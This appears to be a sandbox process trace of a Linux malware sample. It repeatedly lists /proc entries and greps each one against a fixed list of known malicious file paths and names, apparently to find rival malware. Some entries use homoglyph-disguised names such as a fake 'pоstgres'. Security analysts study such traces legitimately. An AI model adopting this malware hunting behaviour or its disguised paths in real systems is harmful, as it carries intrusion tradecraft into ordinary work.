/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1034
-
-
/bin/grepgrep exe2⤵PID:1038
-
-
/bin/lsls -latrh /proc/7102⤵PID:1037
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1040
-
-
/bin/grepgrep exe2⤵PID:1044
-
-
/bin/lsls -latrh /proc/7112⤵PID:1043
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1048
-
-
/bin/grepgrep exe2⤵PID:1052
-
-
/bin/lsls -latrh /proc/722⤵PID:1051
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1054
-
-
/bin/grepgrep exe2⤵PID:1058
-
-
/bin/lsls -latrh /proc/7222⤵PID:1057
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1062
-
-
/bin/grepgrep exe2⤵PID:1067
-
-
/bin/lsls -latrh /proc/732⤵PID:1066
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1070
-
-
/bin/lsls -latrh /proc/7342⤵PID:1073
-
-
/bin/grepgrep exe2⤵PID:1074
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1078
-
-
/bin/grepgrep exe2⤵PID:1083
-
-
/bin/lsls -latrh /proc/742⤵PID:1082
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1085
-
-
/bin/grepgrep exe2⤵PID:1089
-
-
/bin/lsls -latrh /proc/752⤵PID:1088
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1091
-
-
/bin/grepgrep exe2⤵PID:1094
-
-
/bin/lsls -latrh /proc/762⤵PID:1093
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1097
-
-
/bin/grepgrep exe2⤵PID:1100
-
-
/bin/lsls -latrh /proc/782⤵PID:1099
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1102
-
-
/bin/grepgrep exe2⤵PID:1105
-
-
/bin/lsls -latrh /proc/82⤵PID:1104
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1107
-
-
/bin/grepgrep exe2⤵PID:1110
-
-
/bin/lsls -latrh /proc/812⤵PID:1109
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1112
-
-
/bin/grepgrep exe2⤵PID:1115
-
-
/bin/lsls -latrh /proc/822⤵PID:1114
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1117
-
-
/bin/lsls -latrh /proc/842⤵PID:1119
-
-
/bin/grepgrep exe2⤵PID:1120
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1122
-
-
/bin/grepgrep exe2⤵PID:1125
-
-
/bin/lsls -latrh /proc/92⤵PID:1124
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1127
-
-
/bin/grepgrep exe2⤵PID:1130
-
-
/bin/lsls -latrh /proc/buddyinfo2⤵PID:1129
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1132
-
-
/bin/grepgrep exe2⤵PID:1135
-
-
/bin/lsls -latrh /proc/bus2⤵PID:1134
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1137
-
-
/bin/grepgrep exe2⤵PID:1140
-
-
/bin/lsls -latrh /proc/cgroups2⤵PID:1139
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1142
-
-
/bin/grepgrep exe2⤵PID:1145
-
-
/bin/lsls -latrh /proc/cmdline2⤵PID:1144
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1147
-
-
/bin/grepgrep exe2⤵PID:1150
-
-
/bin/lsls -latrh /proc/consoles2⤵PID:1149
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1152
-
-
/bin/grepgrep exe2⤵PID:1155
-
-
/bin/lsls -latrh /proc/cpuinfo2⤵PID:1154
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1157
-
-
/bin/grepgrep exe2⤵PID:1160
-
-
/bin/lsls -latrh /proc/crypto2⤵PID:1159
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1162
-
-
/bin/grepgrep exe2⤵PID:1165
-
-
/bin/lsls -latrh /proc/devices2⤵PID:1164
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1167
-
-
/bin/grepgrep exe2⤵PID:1170
-
-
/bin/lsls -latrh /proc/device-tree2⤵PID:1169
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1172
-
-
/bin/grepgrep exe2⤵PID:1175
-
-
/bin/lsls -latrh /proc/diskstats2⤵PID:1174
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1177
-
-
/bin/grepgrep exe2⤵PID:1180
-
-
/bin/lsls -latrh /proc/dma2⤵PID:1179
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1182
-
-
/bin/grepgrep exe2⤵PID:1185
-
-
/bin/lsls -latrh /proc/driver2⤵PID:1184
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1187
-
-
/bin/grepgrep exe2⤵PID:1190
-
-
/bin/lsls -latrh /proc/execdomains2⤵PID:1189
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1192
-
-
/bin/grepgrep exe2⤵PID:1195
-
-
/bin/lsls -latrh /proc/fb2⤵PID:1194
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1197
-
-
/bin/grepgrep exe2⤵PID:1200
-
-
/bin/lsls -latrh /proc/filesystems2⤵PID:1199
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1202
-
-
/bin/grepgrep exe2⤵PID:1205
-
-
/bin/lsls -latrh /proc/fs2⤵PID:1204
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1207
-
-
/bin/grepgrep exe2⤵PID:1210
-
-
/bin/lsls -latrh /proc/interrupts2⤵PID:1209
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1212
-
-
/bin/grepgrep exe2⤵PID:1215
-
-
/bin/lsls -latrh /proc/iomem2⤵PID:1214
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1217
-
-
/bin/grepgrep exe2⤵PID:1220
-
-
/bin/lsls -latrh /proc/ioports2⤵PID:1219
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1222
-
-
/bin/grepgrep exe2⤵PID:1225
-
-
/bin/lsls -latrh /proc/irq2⤵PID:1224
-
-
